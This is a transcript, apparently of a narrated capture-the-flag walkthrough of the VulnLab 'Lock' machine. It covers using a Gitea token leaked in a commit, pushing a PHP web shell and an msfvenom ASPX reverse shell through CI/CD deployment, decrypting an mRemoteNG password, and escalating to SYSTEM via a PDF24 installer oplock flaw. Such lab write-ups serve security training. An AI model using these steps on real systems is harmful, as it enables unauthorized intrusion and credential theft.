Welcome back. Today we're going to be looking at lock on VulnLab. So let's go ahead and get this guy started off with a brush scan here as usual, right? I believe I already have the IP address. Yes, I do. What works really well is whenever you actually open up the VPN. Okay, let's try that again. There we go. So it looks like we got port 80.445.3000, 5357 and 5985. Let's go and check out that port 3000 like real quick. Let's go ahead and curl that. See if we figure out anything about it. What did that say? I thought I just saw something. I was moving too fast. Gatia runs anywhere. Okay, cool. So we got Git or Gatia, however you want to look at it. Okay, but I believe it's Git, right? It's saying a cookie for us immediately. Let's go ahead and head over into there, and we'll see what's going on with this guy. Let me also get my city notes up and running here, and we'll head over to there. Okay, so we got Git with a cup of tea. A pin. Let's see if we can sign in or maybe sign up or something like that. Forgot password, remember this device. Nope. Let's go ahead and go to Explorer. Okay, so we do have some public repositories here. We have a dev scripts, right? Let's go ahead and check out this repo like right here, repos.py. Let's go and see what if we got any. So we do have two commits of one branch. Okay, so we got repos.py here. All right, let's go and get a little bit closer to this thing so you guys can actually see it. Looks like we get an access token, or we need an access token to actually be able to access this, right? So let's go ahead and back that up, and we'll go into, okay, there's two commits for this guy. So we have another one, add repos. Okay, and we have an access token like right here. All right, cool. Let's go ahead and, I guess, grab this like right here, and we'll see what we can do with it, right? Yep. Let's go ahead and just run it. We do have a good Git domain like right now, so let's go ahead and run it and see if we find anything in here. It looks like it's looking at repos, right? For repo, and repos printf repo full name. Okay, this is by Ellen Freeman. So let's go ahead and test this out like real quick. Sublime repo.py. As you can see, I was trying it earlier, but I didn't really get anywhere with it. So let's go ahead and do a little git clone here. Or yeah, we can just actually run that sublime or python repos.py to the IP address that we want, right? Which is going to be this like right here. Okay, so it looks like we have an Ellen Freeman website and also dev scripts, right? So now, this is where I kind of got lost beforehand. We can go ahead and you can, for your Xbuster this 3000, you'll find like a API, users, and all this other stuff. I was throwing tokens in there and everything like that. And I can never find this website one, but I think I know what to do now. The other day I was thinking about it and I realized I probably need to actually like give like a password or something, right? And from what I've come to learn, I just learned this earlier today, that this token like right here can also be used as a password. So we can try to do like a git clone. Actually, let's go ahead and do a git clone. That like right there, slash ellen.freeman slash website. I think we can do it like that. Username, ellen.freeman. Password. I'm going to put that token in there, see if that works. Oh my God, it does work. Okay, cool. Yeah, I learned earlier that you can actually put a token in for a password, which is pretty freaking cool, like right there. What I'm actually gonna do, like, right, I'm gonna pause the video like real quick. I'm gonna go through that again just so I can show it, so then it can go, onto the onto YouTube like right there, because I didn't know that you could do that until I didn't even test it till 10 seconds ago. I did not know you could do that, right? Just go into LS Tech LA, remove TechR off that website right there. And what I'm going to do is I'm just going to go ahead and stop recording on this one, record another one, and then come back to this one. So now we have that website, right? So we'll cd the website there, right? And let's go ahead and cat the changelog, I guess. Added first website version, okay? Cat readme. Okay, CI/CD integration is now active. Changes to the repository will automatically be deployed to the web server. And we now have the repository. So technically what we should be able to do is put something in here. I don't know, maybe a PHP file. No. CD assets. Can we put PHP in here? I wonder what type of file we can actually put in here. Or maybe an ASPX. Or I wonder if it really cares. Let's go and see .git like real quick. Okay. Okay, cool. So we do have PHP in here. Right. No, that's all JavaScript stuff like right there. See, do we have anything that's like style? I wonder if it can actually take PHP. Let's go ahead and try it. Actually, when I curled it, what was it running on? Are we using an XAMPP server or anything like that? Set cookie. Okay, it's not showing us. It's not showing if it's IIS or Apache. If it's because it feels like an XAMPP server, then it's most likely has what is it? PHP on it, right? Because XAMPP, that's what one of the things it has. We are hacking block on VulnHub or VulnLab, excuse me. All right, so let's go ahead and we will try to put something in here. I'm thinking PHP at first. And if not, we know it's a Windows machine. So if not, maybe an ASPX. Let's try PHP first though. So let me go ahead and locate Win PHP. Win shell, I think it's called. Yep. So I have it in here, right? We also have it for that, like right there. Let's go and grab that, and we will copy that to right here. And then we'll go ahead and we'll grab my IP address. And we'll do it on port 445 because we know that is open and talking to us. We saw that on the Rust scan, right? So let's go ahead and RL wrap that like real quick. And I guess this is index.html though, huh? So I don't know if this is actually going to work or not. But we can go and copy now that winshell.php into website, and then we could try to push that back at it, right? Let's just actually go ahead and make a MSF Venom file also, since we're already here, and we can push them both at the same time. MSF Venom, TACP, Windows, TACP, Windows, x64, shell, reverse TCP, lhost equals ton 0, lport equals 445, tac f aspx, and we'll save that as shell.aspx. And that's already in website, right, up here. So let's go ahead and we'll do those two things, right? So now we'll have a PHP and also that shell.aspx. Now what we have to do is we have to actually commit that like right there, right? So we'll do a git commit tac caret. Huh. Okay. So let's see here. Let's try some of this. Git add a shell aspx. Git add winshell.php. Git commit. Okay. Yeah, I think so. I think I can. So I'm say git config global invalid key. Key does not contain a section Cali. Oh boy, okay. Set your account's default identity. omit global. I think it's, what? That doesn't seem right, like right there. Yeah, I didn't think so. Probably git commit global. Okay. Let's see here. That's really annoying that's not a thing like right there. User email you. Can we just do something like this? We can. Okay, cool. Please do that. No, okay, we got it. Okay. So now we put two files in there, right? Although they're the same exact size though. Oh no, that's create mode. Okay, I'm about to say, I'm like, wait a minute, what? Wait, those aren't the same exact size. Those are also freaking huge. Okay, so we already have port 445 up and running, right? So we can try to go win shell and then shell at ASPX. And this is on the website, right? There's also port 80 we saw earlier. So let's just go ahead and just go over to port 80 maybe. Okay, and this is most likely slash index.html, right? Yes, it is. Okay, cool. So let's go ahead and try that win shell.php. Okay, so that one, it most likely cannot run it. Then we'll try that shell.aspx. Wait, did I even do a push yet? Yep, okay, we need to still do that push, huh? So we did our commit now. Now we need to git config. Okay, how are we gonna do this like right here? It should be git config, right? Git config. And then to be able to do that, we need to do a tac local, right? And then we gotta do our HTTP extra header because we need to put in the we would need the extra header because we need to put in our token, right? Whoops. Should have to do something like that, right? Looks like it worked. Well, yeah, that should have worked right there because we put everything. Okay, let's go and try that shell ASPX again. Okay, nope. Okay, I feel like we have to actually tell it where to go, right? No, we still got to push it. Um, so good thing I have a Git site, huh? A GitHub, or else we'd be sitting here all fucking day. Okay, so now both those things should be in there, right? And the reason we do all that is because we're within. There's our Git repository right there, right? I wonder if the change log. Well, the change log would change because we'd actually have to come back down to ourselves, huh? Damn, really? Nope, it's still actually trying to load. I did say ton zero also, which sometimes that messes up, sometimes it doesn't. Oh, we got something over here. I wonder what we actually got it with. It was probably that shell.aspx, huh? Okay, cool. So we got something now. Okay, who am I slash all? Nothing cool down here. And we are Alan Freeman. Okay. Yeah, total zero will be equal to my IP. Sometimes it works, sometimes it doesn't. So just so you know. Okay. So we got all that now, right? So we should, let's see here. Let's go in CD into C users. Okay, so we got another user on here with Gail on here. It's also SSH is also on here too. I want to type that out. Okay, supposedly this is her credentials, like right here. Was SH open on this guy? That'd be sweet if it was. No, it's not. Okay. But RDP is. I wonder if she can RDP. Okay. What happened there? Ten 79 94, right? No idea what the hell's doing that. I know. I don't know why it's doing that now. What that new thing is like right there. For some reason it immediately fails, but that may also not be the correct credentials. We also have this SSH up here, but SSH isn't open. Okay, so that's not the correct credentials. Okay. oplock.vl? oplock. Okay. Okay. Is there anything else in here? Nope. Database here. I don't know how much this is actually going to help us out, though. Okay, let's go and try this like right here. I just want to see if port 22 is open anywhere on here. No, it's not. Okay. 8,000 is though. I don't know what that is. 88,000 is open. It's kind of strange, like right there. But okay. Might have to look at that later. Keep that in the back of my head, like right there. All right. Let's go ahead and try. Crap. It's not gonna be able to do it. Okay. So we can't do it that way, like right there. The reason I knew we immediately couldn't do it is kept trying to connect. And pretty much we would need the username and password up here, but we actually technically we don't have her password like right now, right? We just have just her whatever. I forget where we were at. Okay, let's go back and see. We have her GitHub token. That's it. Or Gitsy token. Then we have her Gitsy password, right? All right. I want to try some stuff in here. like look through history, things like that, because we need either a password or something, right? So let's go ahead and look at Windows. It's all jacked up over here for me too. And we'll go ahead and we'll look at I think I have it in finding passwords or something like that. Okay, history, prison groups, rename prison run as finding passwords. Okay. So let's go ahead and try something like this, like right here. See if we can find anything. And also we still need that users.txt file too. That one was short of the token. That was just, yeah, I think it's just her Git credentials, like right there. And I was hoping her Git credentials would be the same as her regular credentials, you know? Like she reused the password, but she obviously did not. Okay. So now we do have a config.xml and see users. Okay, so that's a little bit different, like right there. Let's go and type that out. Oof, okay. What is this like right here? airmon-ng. We have a protected password in here, and its encryption engine is AES. This is an XML file, so I'm wondering a couple different things here. I do want to try some of the XML like real quick. If we can't find anything, I do want to look at that mremote. mremote-ng holds passwords for different things. So I don't know what that password's for like right there. Let's see. mremote-ng, name connection. See if we can figure it out. RDP is Gale. Okay, mode RDP. So this is Gale's password. This like right here is Gale's password. It's just protected like right now. But I do want to try something real quick, which is cracking XML files. I don't know if this will actually work with this though. It's not the same type of password. So reading XML files. Okay. I'm gonna try this like real quick. Okay. Oh, path is not cred. It's config, huh? Okay. So it does not like that, like right there. Okay, so it's not liking that at all, okay? Okay. Let's go ahead and try it for Gale then. We'll say users Gale. Let's try something like this like right here. Let's see here. Users Gale, right? And this is a completely different type of password. I just want to see if it will actually work or not. We may have to use like an mremote cracker if that exists. Be sweet if it does. Then we'll just be done with this. Okay, so let's go ahead and try. Yeah, this is completely different. You saw how long that one was. And then we have this. You know what I'm saying? Well, let's actually go and we'll look up. Oh, well, there we go. Decrypt MG remote passwords. Okay. I guess we could probably just use that like right there. Right? Let's go ahead and throw. Yeah, because that's not working either. Okay. Let's go ahead and grab this. We'll throw this in my tools like real quick. Okay. Then we'll say. So what does it want? It just wants the password. And then the config file. Okay. Find arguments require the config file. Okay, cool. So we need to get that config file over to us. I figured the easiest way to do that would just be to type it out right. There we go. All right, cool. We got it. So I'm going to make a quick video on this part like right here too. So we're going to make a real quick video. So I'm going to stop this, make a video, and then start back up again. We got that information. Now all we need to do with that password, now all we do is just run it maybe. And grab that IP config again. Because we should be able to get in his Gale now, right? Then we have Gale dot whatever. We have this like right here. First password. Let's see if this actually works for RDP with that airmon-ng file that we found. It looks like it does. Looks like it's working pretty good. Let's go ahead and get this full screen like real quick. PDF 24. Wonder what that is. There's two things on his. Okay, cool. We got a flag here also. Cool. Did not see that coming. I thought it was gonna be like another password or something like that. I don't know why. I'm not used to flags on this thing. Okay. Hey, Aries Gamer, how you doing? Oh, look at you. You got that cool color now. All right, so let's go ahead and let's look up PDF 24 because that's something new like right there, right? Local purpose exploration via MSI installer and PDF 24. Yeah, that's exactly what I want. Thank you. Whatever. Proof of concept. Fast to install file. Okay. The next way to work, PDF 24 query has to be installed via the MSI file. Afterwards, any low privilege user can run the following command to start the repair of PDF 24 creator and trigger the vulnerable actions without a UAC pop-up. At the very end of the repair process, sub-process, boom, boom. So we just need something called C program files, facts.log. This can be used by an attacker by simply saying an op clock on the file as soon as it gets read. To do that, one can use the setOpClock.exe tool from this with the following parameters. So what? Trigger vulnerable actions. Okay. So can I just like make this file? Is that all it's doing? I wonder if anyone's made something for it yet. Via MSI installer. Okay. Exactly what we already have. Okay. So now he's got to try to figure out, do you think I need to do PMPT before OSP? Because no, there's a giver. I do not. The OSCP, at least what I got for it, was it was pretty simple. The Active Directory portion. I think that OSCP A, B, and C set you up just fine for it. Okay. So now we just need to figure out where this file is installed at first, right? That's the very first thing we need to figure out. CD into C. It's probably going to be either in program files or program files x86, right? Let's do a quick lstack force just in case. Okay, there we go. All right. lstack force is kind of like lstack LA for Linux. So we can actually cd into install. Okay, there's our installer like right there. And then our, well, no, like right there is our PDF24. Okay, so we do have PDF24 on here. Okay. Now, next thing we need to do, I believe, um, okay, we need to set op lock, right? I don't know how I really don't understand how this exploit actually works. Set op lock, GitHub. It's already a compiled version of it. I feel like there's already a compiled version. There we go. Thank you. That says symlink. That 100% says symlink, didn't it? Set op lock. Thank you. So I'm listening to Chris Cornell right now. Hey, thank you very much, anonymous gifter. I'm listening to Chris Cornell right now, right? And he's singing that one song by Michael Jackson, Billie Jean. And I remember a while ago, it was a while ago, there's someone on like America's Got Talent or one of those freaking shows, I don't know. But I remember sitting there watching my friend, right? And we're just kind of just chilling, right? I was back in America at that time. We're just kind of just chilling, and that was on. And this guy came out with his guitar and started playing this song, right? And they're talking about how that was the most beautiful edition they ever heard of it, and how, like him making this up and all this other stuff was just great. And he did not correct them. He did not say, no, that's the Chris Cornell version. He didn't say that at all. He just took all these compliments, right? Came out like a couple weeks later, people were like, wait a minute, like Chris Cornell did that already? And yeah, he ended up getting kind of blasted for it. I remember that one. That was pretty funny because I'm listening to it and they're like, oh, that was a beautiful rendition of it. Like, and there's pretty much saying like he made it. And he's just like, yep, you know. And I remember sitting there watching with my friend. I'm like, Chris Cornell already did that. He did that like, a year ago or whatever. All right, there. I don't know why I just told that story, but whatever. All right, let's go ahead and move downloads. I'm about to say, what am I doing? Oh God, I got a lot of stuff in downloads like right now. Thought he would get away with it. But there's people like me that, if Chris Cornell was still alive, I'd probably marry him. 100% leave my wife for Chris Cornell. So I told my wife all the time. I'm like, yo, I will 100% leave you for Chris Cornell, but he's dead now, so rest in peace. All right, let's go ahead and get this onto here, right? So what we can do with this is just create a quick Python server. I don't think I want to put it in there though, right? Does it? Might not matter. Let's see here. Can we do that like right there? I don't know if we're gonna get denied. Okay, cool. So we got it in there, right? Set op lock. Okay. All right. Now we have that. Now we need to put in that op lock of Let me see here. What was it again? So we need to put this like right here in there, right? But ours is gonna be a little bit different, right? So I just don't want to just throw that into like immediately. So we're going Control C, Control V. Okay, because I think we need ours in C install, right? I would think. Or does that not really matter? Do I need the MSI file or do I need the... Hold up. Now I think about it. Hold up. Instead, I need the executable, right? Path to executable. So I'll need this place like right here, right? Okay. So I think what we need to do is do a quick run this guy. Okay. Now we need to set the out block, right? And I don't know if we actually need that R at the end or not, but I'm just going to go with that's it. I don't know if I also need to do like super quickly. Also, I also don't know how I'm doing it here when I have freaking RDP open, don't I? Yeah, we should probably be doing it here, right? Why is that guy even doing it? Secondly, here, let's go ahead and hop over to here and go into PowerShell. This will probably be like a little bit easier, right? There's probably a reason that we got this PowerShell open, right? Let's go and get this a little bit open, like a little bit more. Let's go and run that save that thing, huh? I wonder if it makes like a new pretty much we need to run those two save that commands over here. Then we need to set that op lock, right? Okay, there we go. So now do I just click next? Repair? To say something about repair, I remember reading that blog post about it or whatever. I don't know how long it's also going to take too. I have no idea. Especially since I did it somewhere else too. Hey, where'd you go? If the op lock is set, the command window like it's open when pf24 installer.exe is executed doesn't close. The attacker cannot perform. Okay. Right click on the top bar of the command window. Okay. Do I have to actually open it up? Under click on properties under options, click on legacy console mode. Properties. Legacy console. Oh. What just happened like right here? Something else is happening here. Okay, so legacy console. Open the link with a browser other than Internet Explorer Edge. Both don't open a system when in Windows 11. In the open browser window, press the combination Control plus O, type command.exe. Under the, okay, Firefox down here, wasn't it? So then we open up Firefox, right? That's what it said, right? This says open the link with a browser other than Internet, okay. In the open browser window, press the key combination Control plus O. Okay, that does do. Okay, so that opens something. Okay, type command.exe at the top and press enter. Okay, I'm still Gale though. I wonder if I'm waiting for something to actually open up over here. Sure, why not? We can close the application. The setup was unable to automatically close. Please show that. Okay. Were two command prompts open? Yeah, because I typed in command.exe, didn't I? That's why. Okay. I'm also wondering if I have to do this first, then this, or if we're waiting on something else here, or if it just takes a while. Okay, hold up. Cancel. I think I also messed up getting the MSI program. Okay, let's go and try this again. Okay, we're going to finish that because I remember something about the MSI program. Look, we were right. Yep, MSI exec, path to installer. Okay, so we want actually this like right here. We want to do like that, huh? And we want C install, right? Hmm. Okay, wrong PDF creator. 11.15.1 x64 MSI. There we go. Okay, so there's that, right? Okay. Now we can go ahead and do the set the op lock thing, right? Okay, now we can do that. I was going to try that like right there. So guys, going to take a minute, it looks like. We'll go ahead and we'll head back over to here, make sure we did that right. Very end of the process. Call the system. This can be used by attacker by simply saying op lock. Okay. So we did all that, right? Okay. I think we're on the right track now. I think we are. This is going to take a minute to actually run, but hopefully we actually get somewhere right. Yeah, that's what I would do, Ares Gamer. Just I don't see any point. I would say the only thing that really actually prepared me for OSCP was like way above and beyond it. Two things, way above and beyond Hack the Box Academy, and also the CRTP path there, the pen tester job role path, and also what's it called? VHL, Virtual Hacking Labs. Those are the only two things that really were like something I actually say like, wow, this really helped me. But they were both also above and beyond it. Um, I feel like Virtual Hacking Labs, um, the Pro Labs are way beyond it. The Advanced Plus Labs, or the Beginner Advanced Plus, whatever it's called. Okay, so this is opened up. There we go. Okay, this looks better. Those ones are on par with OSCP, if not above it. So let's go ahead and go to properties now. We'll click on that use legacy mode. Okay. Open up Firefox, press Control O, right? And then go to command.exe. We're still Gale. We're supposed to open up as yeah, okay, so that's definitely not system like right there. Okay, so we're supposed to open up as let's open up previous tabs. Okay, so that's nothing. That's really nothing to us like right there. Okay, let's go ahead and so that's just opened up. So we just want this guy to kind of wait now, right? Um, Open the link with a browser or then the Internet Explorer. Okay, so we're gonna open up a link. It said. I don't know what link it's talking about there. So let's go ahead and right click again. We'll go to properties, use legacy mode, right? We're gonna say okay. Say okay. I don't know what link it's talking about or where this link is at. properties. Do I have to learn more about it? It says link, right? So maybe learn more about it. In Firefox? Okay. Control O. Good morning, Tigor. How you doing? Now let's try command. .exe. It still doesn't look right. I'm still Gale. Okay, so that was obviously not it. It says to open up a link. Where's this link supposedly at? Find out more about new console features. Use legacy console, right? Requires relaunch. Affects all consoles. That's why we gotta do it like that, because we'd have to get the relaunch of it, right? Let's say okay. Go back into it, properties, and then click on this link down here. This legacy console mode. Okay. This is looking better, isn't it? Okay, so we have to click on use the legacy console mode, and then we have to click on that link that's right underneath that blue link, like right there. And then we have to hope that this doesn't freeze like right here. Now let me go ahead and properties, get this a little bit bigger for you guys. Font, we'll say, fucking no. 12 by 16, I guess, okay? There we go, okay. Who am I? And we are NT Authority System, CD to C, users, administrator. No, okay. CD to C, CD into users, CD into administrator, CD into desktop. And there's our final flag. Root.txt. Jesus, if I could type. There we go. Oh, it's actually have insert on or something. So yep, NT System Authority has full permission. All right, cool. So that's gonna be the whole box like right there. So let's go ahead and check out. I'm not gonna read the root.txt for y'all. Let's go ahead and check out InfoSec streams. All right, it looks like top cleans on, although that's true or not. But that's gonna be it for that box like right there.